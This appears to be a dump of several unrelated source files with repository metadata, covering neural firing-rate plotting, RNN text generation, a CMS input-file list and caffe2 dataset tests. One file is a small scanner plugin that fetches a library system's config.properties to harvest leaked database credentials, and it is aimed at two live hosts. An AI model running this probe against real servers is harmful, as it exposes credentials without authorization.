bin_width = int(dat.firing_rate_params['step_size'])
baks_time_vec = time_vec[::bin_width]
#fin_pval_frame = fin_pval_frame[fin_pval_frame.time.isin(baks_time_vec)]
corr_frame['time'] = (corr_frame.bins * bin_width)-stim_t
discrim_frame['time'] = (discrim_frame.bins * bin_width)-stim_t
discrim_frame = discrim_frame[discrim_frame.time.isin(baks_time_vec)]
corr_frame = corr_frame[corr_frame.time.isin(baks_time_vec)]
# Add region name
corr_frame['region'] = [fin_unit_map[x] for x in \
corr_frame.neurons.values]
discrim_frame['region'] = [fin_unit_map[x] for x in \
discrim_frame.neurons.values]
discrim_frame.to_json(
os.path.join(plot_save_dir, f'{data_basename}_discrim_frame.json')
)
corr_frame.to_json(
os.path.join(plot_save_dir, f'{data_basename}_corr_frame.json')
)
mean_firing = np.mean(dat.firing_array,axis=2)
mean_firing = mean_firing[...,time_lims[0]//bin_width:time_lims[1]//bin_width]
for this_region_name, this_unit_list in zip(dat.region_names,dat.region_units):
for unit_num in this_unit_list:
#unit_frame = fin_pval_frame[fin_pval_frame.neurons.isin([unit_num])]
unit_corr_frame = \
corr_frame[corr_frame.neurons.isin([unit_num])]
unit_sig_corr = unit_corr_frame[unit_corr_frame.corr_pvals < alpha]
unit_discrim_frame = \
discrim_frame[discrim_frame.neurons.isin([unit_num])]
unit_discrim_frame['bool'] = \
1*(unit_discrim_frame.discrim_p_vals < alpha)
#fig,ax = plt.subplots(3,1, sharex=True)
fig = plt.figure()
ax = []
ax.append(fig.add_subplot(2,1,1))
ax.append(fig.add_subplot(4,1,3))#, sharex = ax[0]))
ax.append(fig.add_subplot(4,1,4))#, sharex = ax[0]))
xlims = [-500, 1500]
xinds = np.logical_and(baks_time_vec >= xlims[0],
baks_time_vec <= xlims[1])
fin_time_vec = baks_time_vec[xinds]
unit_discrim_frame = unit_discrim_frame[unit_discrim_frame.time.isin(fin_time_vec)]
unit_corr_frame = unit_corr_frame[unit_corr_frame.time.isin(fin_time_vec)]
unit_sig_corr = unit_sig_corr[unit_sig_corr.time.isin(fin_time_vec)]
for taste_num,this_taste in enumerate(mean_firing[:,unit_num]):
ax[0].plot(fin_time_vec,
this_taste[xinds], label = taste_names[taste_num],
linewidth = 2)
#ax[0].legend()
fig.suptitle(os.path.basename(dat.data_dir) + \
f'\nUnit {unit_num}, '\
f'Electrode {dat.unit_descriptors[unit_num][0]}')#, '\
#f'Region : {this_region_name}')
ax[-1].set_xlabel('Time post-stimulus delivery (ms)')
ax[0].set_ylabel('Firing Rate (Hz)')
#ax[0].set_xlim([-500, 1500])
#ax[1].set_xlim([-500, 1500])
#ax[2].set_xlim([-500, 1500])
cmap = plt.get_cmap('binary')
#ax[1].plot(unit_discrim_frame.time, unit_discrim_frame['bool'])
ax[1].plot(unit_discrim_frame.time,
unit_discrim_frame['discrim_bool_cons'],
color = cmap(0.5))
ax[1].fill_between(
x = unit_discrim_frame.time,
y1 = unit_discrim_frame['discrim_bool_cons'],
y2 = 0,
alpha = 0.7,
color = cmap(0.5))
#ax[1].plot(unit_discrim_frame.time,
# np.log10(unit_discrim_frame['p_vals_conv']))
#ax[1].axhline(np.log10(0.05))
ax[1].set_ylabel('Discrim sig')
ax[2].plot(unit_corr_frame.time, unit_corr_frame.corr_rhos,
color = cmap(0.7))
ax[2].fill_between(
x = unit_corr_frame.time,
y1 = unit_corr_frame['corr_rhos'],
#where = unit_corr_frame['corr_pvals'] <= 0.05,
where = unit_corr_frame['sig_bool'],
y2 = 0,
alpha = 0.7,
color = cmap(0.7))
#ax[2].plot(unit_sig_corr.time, unit_sig_corr.corr_rhos, 'x')
ax[2].set_ylabel('Pal Corr sig')
#ax[0].tick_params(axis='x', which = 'both', bottom = False)
ax[0].set_xticklabels([])
ax[1].set_xticklabels([])
#plt.show()
fig.savefig(os.path.join(get_plot_dir(this_region_name),
f'{data_basename}_unit{add_to_counter(this_region_name)}' + '.svg'))
plt.close(fig)
| [
"[email protected]"
]
| |
a7556063e49aff2dda7e2b3cc964e43037048d34 | 6cb1d8f1416af7b7c5c83ab35cb6928ea9955aff | /ch07/rnnlm_gen.py | a30f1107227f403e0e15f919e3f9b09e39193409 | []
| no_license | lee-saint/practice-nlp | f68ccc3140f725f3edcd7048c324b847583b7f20 | 19003fcd5f55f4f110417a3950a32bb5fba1850c | refs/heads/master | 2020-12-01T20:05:15.014495 | 2020-01-21T09:22:18 | 2020-01-21T09:22:18 | 230,750,152 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,799 | py | import numpy as np
from common.functions import softmax
from ch06.RNNLM import Rnnlm
from ch06.better_rnnlm import BetterRnnlm
from dataset import ptb
class RnnlmGen(Rnnlm):
def generate(self, start_id, skip_ids=None, sample_size=100):
word_ids = [start_id]
x = start_id
while len(word_ids) < sample_size:
x = np.array(x).reshape(1, 1)
score = self.predict(x)
p = softmax(score.flatten())
sampled = np.random.choice(len(p), size=1, p=p)
if (skip_ids is None) or (sampled not in skip_ids):
x = sampled
word_ids.append(int(x))
return word_ids
class BetterRnnlmGen(BetterRnnlm):
def generate(self, start_id, skip_ids=None, sample_size=100):
word_ids = [start_id]
x = start_id
while len(word_ids) < sample_size:
x = np.array(x).reshape(1, 1)
score = self.predict(x).flatten()
p = softmax(score).flatten()
sampled = np.random.choice(len(p), size=1, p=p)
if (skip_ids is None) or (sampled not in skip_ids):
x = sampled
word_ids.append(int(x))
return word_ids
if __name__ == '__main__':
corpus, word_to_id, id_to_word = ptb.load_data('train')
vocab_size = len(word_to_id)
corpus_size = len(corpus)
model = RnnlmGen()
model.load_params('../ch06/Rnnlm.pkl')
# set the start word and the words to skip
start_word = 'you'
start_id = word_to_id[start_word]
skip_words = ['N', '<unk>', '$']
skip_ids = [word_to_id[w] for w in skip_words]
# generate a sentence
word_ids = model.generate(start_id, skip_ids)
txt = ' '.join([id_to_word[i] for i in word_ids])
txt = txt.replace(' <eos>', '.\n')
print(txt)
better_model = BetterRnnlmGen()
better_model.load_params('../ch06/BetterRnnlm.pkl')
# set the start word and the words to skip
start_word = 'you'
start_id = word_to_id[start_word]
skip_words = ['N', '<unk>', '$']
skip_ids = [word_to_id[w] for w in skip_words]
# generate a sentence
word_ids = better_model.generate(start_id, skip_ids)
txt = ' '.join([id_to_word[i] for i in word_ids])
txt = txt.replace(' <eos>', '.\n')
print(txt)
better_model.reset_state()
model.reset_state()
start_words = 'the meaning of life is'
start_ids = [word_to_id[w] for w in start_words.split(' ')]
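# Prime the hidden state with all but the last start word, then generate
# the continuation from the final word.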
for x in start_ids[:-1]:
x = np.array(x).reshape(1, 1)
model.predict(x)
word_ids = model.generate(start_ids[-1], skip_ids)
word_ids = start_ids[:-1] + word_ids
txt = ' '.join([id_to_word[i] for i in word_ids])
txt = txt.replace(' <eos>', '.\n')
print('-' * 50)
print(txt)
| [
"[email protected]"
]
| |
941accb672f76b0db53c6f3a669fcfd3f017badb | 227438026ddb81cb13d174fab2f0c492da6c5975 | /python/MuonGunPt50_FullEta_FullPhi_SmallSigmaZ_cfi.py | a59e85f89d64eceb435409fc4a3a149a836cac4e | []
| no_license | skaplanhex/cms-PLTSimulation | 4c360a56335c673e8c703ea70371e58a1aeff60c | 250e324eb3ea83c965dcb0bab47a53b399cf7625 | refs/heads/master | 2021-01-01T15:17:15.047788 | 2014-10-22T00:11:07 | 2014-10-22T00:11:07 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 11,016 | py | import FWCore.ParameterSet.Config as cms
source = cms.Source("PoolSource",
fileNames = cms.untracked.vstring(
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_100_1_NnM.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_10_1_fLF.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_11_1_aaa.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_12_1_4PY.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_13_1_Tuz.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_14_1_6RT.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_15_1_9k4.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_16_1_wr8.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_17_1_rU2.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_18_1_nSq.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_19_1_Gjz.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_1_1_lOE.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_20_1_Mfl.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_21_1_tfb.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_22_1_wlo.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_23_1_c2x.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_24_1_oLd.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_25_1_qSB.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_26_1_vVz.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_27_1_iD8.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_28_1_Tpx.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_29_1_Fhe.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_2_1_nj1.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_30_1_VMa.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_31_1_fve.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_32_1_wwI.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_33_1_xSu.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_34_1_aSb.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_35_1_LTi.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_36_1_hPX.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_37_1_gLE.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_38_1_6dM.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_39_1_890.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_3_1_Dwx.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_40_1_6gM.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_41_1_cRm.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_42_1_l0n.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_43_1_9zp.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_44_1_CEr.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_45_1_SG4.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_46_1_jM1.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_47_1_G1x.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_48_1_rHg.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_49_1_9Ex.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_4_1_nbS.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_50_1_rhf.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_51_1_pVw.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_52_1_CNa.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_53_1_2FH.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_54_1_lzt.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_55_1_aJy.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_56_1_tKI.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_57_1_WQ1.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_58_1_Kyp.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_59_1_eUR.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_5_1_SQM.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_60_1_BDu.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_61_1_xhw.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_62_1_22q.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_63_1_QTZ.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_64_1_djT.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_65_1_krx.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_66_1_RVf.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_67_1_bNe.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_68_1_HOD.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_69_1_rRx.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_6_1_trm.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_70_1_k2l.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_71_1_DFG.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_72_1_5LM.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_73_1_QdN.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_74_1_Fwv.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_75_1_8Xf.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_76_1_fiA.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_77_1_1Wb.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_78_1_oGC.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_79_1_BAa.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_7_1_WWX.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_80_1_0gY.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_81_1_gIc.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_82_1_akZ.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_83_1_TZD.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_84_1_D3p.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_85_1_AM5.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_86_1_TnA.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_87_1_lvl.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_88_1_Tv0.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_89_1_G0q.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_8_1_IJR.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_90_1_NTZ.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_91_1_7CQ.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_92_1_bPW.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_93_1_pg2.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_94_1_b1K.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_95_1_qJs.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_96_1_BkG.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_97_1_tGZ.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_98_1_Kof.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_99_1_eMp.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_9_1_fKI.root',
)
)
| [
"[email protected]"
]
| |
f45d517a51288fdf1af81238bef427c053fc9fbe | f47863b3a595cbe7ec1c02040e7214481e4f078a | /plugins/scan/libsys/1530.py | 7d4393ead3d8ab208722872e6653f54514040048 | []
| no_license | gobiggo/0bscan | fe020b8f6f325292bda2b1fec25e3c49a431f373 | 281cf7c5c2181907e6863adde27bd3977b4a3474 | refs/heads/master | 2020-04-10T20:33:55.008835 | 2018-11-17T10:05:41 | 2018-11-17T10:05:41 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 617 | py | #!/usr/bin/python
#-*- encoding:utf-8 -*-
# title: Huiwen (汇文) libsys library management system - sensitive information disclosure
#http://www.wooyun.org/bugs/wooyun-2010-0125785
def assign(service, arg):
if service == "libsys":
return True, arg
def audit(arg):
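# Probe the exposed properties file for leaked connection credentials
# (host/port/user/password).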
payload = 'include/config.properties'
url = arg + payload
code, head,res, errcode, _ = curl.curl2(url)
if code == 200 and 'host' in res and 'port' in res and 'user' in res and 'password' in res:
security_warning(url)
if __name__ == '__main__':
audit(assign('libsys', 'http://www.njjnlib.cn:8080/')[1])
audit(assign('libsys', 'http://202.201.163.2:8080/')[1])
| [
"[email protected]"
]
| |
21ea5cf5e0b3b2984691a47e3c896c1d987cf016 | 63c5306b91db445016059a7f0c7ac167bf231d3c | /caffe2/python/operator_test/dataset_ops_test.py | ab6645e250bc558346fef1dfa56e2c3a3abfa0ce | [
"BSD-2-Clause",
"BSD-3-Clause",
"LicenseRef-scancode-generic-cla",
"MIT"
]
| permissive | Fletcher3003/caffe2 | b57ad712993b7c50d16b8f0eedc2e5587bc89e0e | 731096902a090b49612b02cc5a1301c81bf93943 | refs/heads/master | 2020-04-15T18:10:11.514190 | 2019-01-09T17:10:14 | 2019-01-09T17:10:14 | 164,903,847 | 0 | 0 | Apache-2.0 | 2019-01-09T17:02:59 | 2019-01-09T17:02:53 | Shell | UTF-8 | Python | false | false | 21,910 | py | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import numpy as np
from caffe2.python import core, workspace, dataset
from caffe2.python.dataset import Const
from caffe2.python.schema import (
List, Field, Struct, Scalar, Map, from_blob_list, FetchRecord, NewRecord,
FeedRecord
)
from caffe2.python.test_util import TestCase
import numpy.testing as npt
import string
from hypothesis import given
import hypothesis.strategies as st
def _assert_arrays_equal(actual, ref, err_msg):
if ref.dtype.kind in ('S', 'O', 'U'):
np.testing.assert_array_equal(actual, ref, err_msg=err_msg)
else:
np.testing.assert_allclose(
actual, ref, atol=1e-4,
rtol=1e-4, err_msg=err_msg
)
def _assert_records_equal(actual, ref):
assert isinstance(actual, Field)
assert isinstance(ref, Field)
b1 = actual.field_blobs()
b2 = ref.field_blobs()
assert (len(b1) == len(b2)), 'Records have different lengths: %d vs. %d' % (
len(b1), len(b2)
)
for name, d1, d2 in zip(ref.field_names(), b1, b2):
_assert_arrays_equal(d1, d2, err_msg='Mismatch in field %s.' % name)
@st.composite
def _sparse_features_map(draw, num_records, **kwargs):
sparse_maps_lengths = draw(
st.lists(
st.integers(min_value=1, max_value=10),
min_size=num_records,
max_size=num_records
)
)
sparse_maps_total_length = sum(sparse_maps_lengths)
sparse_keys = draw(
st.lists(
st.integers(min_value=1, max_value=100),
min_size=sparse_maps_total_length,
max_size=sparse_maps_total_length,
unique=True
)
)
sparse_values_lengths = draw(
st.lists(
st.integers(min_value=1, max_value=10),
min_size=sparse_maps_total_length,
max_size=sparse_maps_total_length
)
)
total_sparse_values_lengths = sum(sparse_values_lengths)
sparse_values = draw(
# max_value is max int64
st.lists(
st.integers(min_value=1, max_value=9223372036854775807),
min_size=total_sparse_values_lengths,
max_size=total_sparse_values_lengths
)
)
return [
sparse_maps_lengths,
sparse_keys,
sparse_values_lengths,
sparse_values,
]
@st.composite
def _dense_features_map(draw, num_records, **kwargs):
float_lengths = draw(
st.lists(
st.integers(min_value=1, max_value=10),
min_size=num_records,
max_size=num_records
)
)
total_length = sum(float_lengths)
float_keys = draw(
st.lists(
st.integers(min_value=1, max_value=100),
min_size=total_length,
max_size=total_length,
unique=True
)
)
float_values = draw(
st.lists(st.floats(),
min_size=total_length,
max_size=total_length)
)
return [float_lengths, float_keys, float_values]
@st.composite
def _dataset(draw, min_elements=3, max_elements=10, **kwargs):
schema = Struct(
# Dense Features Map
('floats', Map(
Scalar(np.int32), Scalar(np.float32)
)),
# Sparse Features Map
('int_lists', Map(
Scalar(np.int32),
List(Scalar(np.int64)),
)),
# Complex Type
('text', Scalar(str)),
)
num_records = draw(
st.integers(min_value=min_elements,
max_value=max_elements)
)
raw_dense_features_map_contents = draw(_dense_features_map(num_records))
raw_sparse_features_map_contents = draw(_sparse_features_map(num_records))
raw_text_contents = [
draw(
st.lists(
st.text(alphabet=string.ascii_lowercase),
min_size=num_records,
max_size=num_records
)
)
]
# Concatenate all raw contents to a single one
contents_raw = raw_dense_features_map_contents + raw_sparse_features_map_contents + raw_text_contents
contents = from_blob_list(schema, contents_raw)
return (schema, contents, num_records)
class TestDatasetOps(TestCase):
@given(_dataset())
def test_pack_unpack(self, input):
"""
Tests if packing and unpacking of the whole dataset is an identity.
"""
(schema, contents, num_records) = input
dataset_fields = schema.field_names()
net = core.Net('pack_unpack_net')
batch = NewRecord(net, contents)
FeedRecord(batch, contents)
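# Pack the flat field blobs into single-row records, unpack them again and
# check that every field round-trips unchanged.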
packed = net.PackRecords(
batch.field_blobs(), 1,
fields=dataset_fields
)
unpacked = packed.UnPackRecords(
[], len(dataset_fields),
fields=dataset_fields
)
workspace.RunNetOnce(net)
for initial_tensor, unpacked_tensor in zip(
batch.field_blobs(), unpacked
):
npt.assert_array_equal(
workspace.FetchBlob(initial_tensor),
workspace.FetchBlob(unpacked_tensor)
)
def test_dataset_ops(self):
"""
1. Defining the schema of our dataset.
This example schema could represent, for example, a search query log.
"""
schema = Struct(
# fixed size vector, which will be stored as a matrix when batched
('dense', Scalar((np.float32, 3))),
# could represent a feature map from feature ID to float value
('floats', Map(
Scalar(np.int32), Scalar(np.float32)
)),
# could represent a multi-valued categorical feature map
('int_lists', Map(
Scalar(np.int32),
List(Scalar(np.int64)),
)),
# could represent a multi-valued, weighted categorical feature map
(
'id_score_pairs', Map(
Scalar(np.int32),
Map(
Scalar(np.int64),
Scalar(np.float32),
keys_name='ids',
values_name='scores'
),
)
),
# additional scalar information
(
'metadata', Struct(
('user_id', Scalar(np.int64)),
('user_embed', Scalar((np.float32, 2))),
('query', Scalar(str)),
)
),
)
"""
This is what the flattened fields for this schema look like, along
with their types. Each one of these fields will be stored, read and
written as a tensor.
"""
expected_fields = [
('dense', (np.float32, 3)),
('floats:lengths', np.int32),
('floats:values:keys', np.int32),
('floats:values:values', np.float32),
('int_lists:lengths', np.int32),
('int_lists:values:keys', np.int32),
('int_lists:values:values:lengths', np.int32),
('int_lists:values:values:values', np.int64),
('id_score_pairs:lengths', np.int32),
('id_score_pairs:values:keys', np.int32),
('id_score_pairs:values:values:lengths', np.int32),
('id_score_pairs:values:values:values:ids', np.int64),
('id_score_pairs:values:values:values:scores', np.float32),
('metadata:user_id', np.int64),
('metadata:user_embed', (np.float32, 2)),
('metadata:query', str),
]
zipped = zip(
expected_fields, schema.field_names(), schema.field_types()
)
for (ref_name, ref_type), name, dtype in zipped:
self.assertEquals(ref_name, name)
self.assertEquals(np.dtype(ref_type), dtype)
"""
2. The contents of our dataset.
Contents as defined below could represent, for example, a log of
search queries along with dense, sparse features and metadata.
The dataset below has 3 top-level entries.
"""
contents_raw = [
# dense
[[1.1, 1.2, 1.3], [2.1, 2.2, 2.3], [3.1, 3.2, 3.3]],
# floats
[1, 2, 3], # len
[11, 21, 22, 31, 32, 33], # key
[1.1, 2.1, 2.2, 3.1, 3.2, 3.3], # value
# int lists
[2, 0, 1], # len
[11, 12, 31], # key
[2, 4, 3], # value:len
[111, 112, 121, 122, 123, 124, 311, 312, 313], # value:value
# id score pairs
[1, 2, 2], # len
[11, 21, 22, 31, 32], # key
[1, 1, 2, 2, 3], # value:len
[111, 211, 221, 222, 311, 312, 321, 322, 323], # value:ids
[11.1, 21.1, 22.1, 22.2, 31.1, 31.2, 32.1, 32.2, 32.3], # val:score
# metadata
[123, 234, 456], # user_id
[[0.2, 0.8], [0.5, 0.5], [0.7, 0.3]], # user_embed
['dog posts', 'friends who like to', 'posts about ca'], # query
]
# convert the above content to ndarrays, checking against the schema
contents = from_blob_list(schema, contents_raw)
"""
3. Creating and appending to the dataset.
We first create an empty dataset with the given schema.
Then, a Writer is used to append these entries to the dataset.
"""
ds = dataset.Dataset(schema)
net = core.Net('init')
with core.NameScope('init'):
ds.init_empty(net)
content_blobs = NewRecord(net, contents)
FeedRecord(content_blobs, contents)
writer = ds.writer(init_net=net)
writer.write_record(net, content_blobs)
workspace.RunNetOnce(net)
"""
4. Iterating through the dataset contents.
If we were to iterate through the top level entries of our dataset,
this is what we should expect to see:
"""
entries_raw = [
(
[[1.1, 1.2, 1.3]], # dense
[1],
[11],
[1.1], # floats
[2],
[11, 12],
[2, 4],
